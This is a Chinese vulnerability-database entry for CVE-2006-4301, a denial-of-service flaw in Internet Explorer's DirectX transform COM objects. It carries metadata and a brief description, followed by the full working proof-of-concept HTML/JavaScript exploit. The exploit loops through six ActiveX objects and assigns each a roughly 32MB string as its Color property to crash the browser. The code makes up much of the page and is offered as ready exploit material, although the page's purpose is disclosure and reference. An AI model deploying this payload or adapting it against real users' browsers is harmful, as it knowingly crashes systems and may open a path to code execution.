Microsoft Internet Explorer多个COM对象颜色属性拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110866 漏洞类型 输入验证
发布时间 2006-08-21 更新时间 2007-01-24
CVE编号 CVE-2006-4301 CNNVD-ID CNNVD-200608-367
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/28421
https://cxsecurity.com/issue/WLB-2006080148
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-367
|漏洞详情
InternetExplorer是微软发布的非常流行的WEB浏览器。InternetExplorer在处理多个COM对象(dxtmsft.dll/dxtmsft3.dll)的颜色属性输入方式时,如果将颜色属性设置为超长字符串的话,就会导致InternetExplorer崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/19640/info

Microsoft Internet Explorer is prone to multiple denial-of-service vulnerabilities that occur when instantiating COM objects. 

The vulnerabilities arise because of the way Internet Explorer tries to instantiate certain COM objects as ActiveX controls, resulting in denial-of-service conditions. Remote code execution may be possible, but this has not been confirmed.

This BID may be related to the issues described in BID 14511 (Microsoft Internet Explorer COM Object Instantiation Buffer Overflow Vulnerability) and BID 15061 Microsoft Internet Explorer COM Object Instantiation Variant Vulnerability). However, these issues affect a different set of COM objects that were not addressed in the previous BIDs.


<!--

// Internet Explorer Multiple COM Object Color Property DoS Vulnerability
// tested on Windows 2000 SP4/XP SP2

// http://www.xsec.org
// nop (nop#xsec.org)

-->
<html>
<head>
<title></title>
</head>
</body>
<script>
var i =0;
var Objects = new Array(

// CLSID: {3A04D93B-1EDD-4f3f-A375-A03EC19572C4}
// Info: MaskFilter
// ProgID: DXImageTransform.Microsoft.MaskFilter.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.MaskFilter.1",

// CLSID: {421516C1-3CF8-11D2-952A-00C04FA34F05}
// Info: Chroma
// ProgID: DXImageTransform.Microsoft.Chroma.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Chroma.1",

// CLSID: {9F8E6421-3D9B-11D2-952A-00C04FA34F05}
// Info: Glow
// ProgID: DXImageTransform.Microsoft.Glow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Glow.1",

// CLSID: {ADC6CB86-424C-11D2-952A-00C04FA34F05}
// Info: DropShadow
// ProgID: DXImageTransform.Microsoft.DropShadow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.DropShadow.1",

// CLSID: {E71B4063-3E59-11D2-952A-00C04FA34F05}
// Info: Shadow
// ProgID: DXImageTransform.Microsoft.Shadow.1
// InprocServer32: C:\WINNT\system32\dxtmsft.dll
"DXImageTransform.Microsoft.Shadow.1",

// CLSID: {8241F015-84D3-11d2-97E6-0000F803FF7A}
// Info: Shapes
// ProgID: DX3DTransform.Microsoft.Shapes.1
// InprocServer32: C:\WINNT\system32\dxtmsft3.dll
"DX3DTransform.Microsoft.Shapes.1",

null
);

var b = "AAAA";

while(b.length < 0x2000000)
{
b += b;
}

while(Objects[i])
{
var a = null;

window.status = "Create Object " + Objects[i] + "...";

try { a = new ActiveXObject(Objects[i]); } catch(e){}

if(a)
{
window.status = "Try Set " + Objects[i] + ".Color ...";
try { a.Color = b;} catch(e){}
}

i++;
}

window.status = "failed!";

</script>
</body>
</html>
|参考资料

来源:MISC
链接:http://xsec.org/index.php?module=releases&act=view&type=1&id=17
来源:XF
名称:ie-com-color-dos(28516)
链接:http://xforce.iss.net/xforce/xfdb/28516
来源:BID
名称:19640
链接:http://www.securityfocus.com/bid/19640
来源:BUGTRAQ
名称:20060821[XSec-06-09]:InternetExplorerMultipleCOMObjectsColorPropertyDoSVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/443907/100/0/threaded
来源:OSVDB
名称:29525
链接:http://www.osvdb.org/29525
来源:OSVDB
名称:29524
链接:http://www.osvdb.org/29524
来源:MILW0RM
名称:4251
链接:http://www.milw0rm.com/exploits/4251
来源:SREASON
名称:1439
链接:http://securityreason.com/securityalert/1439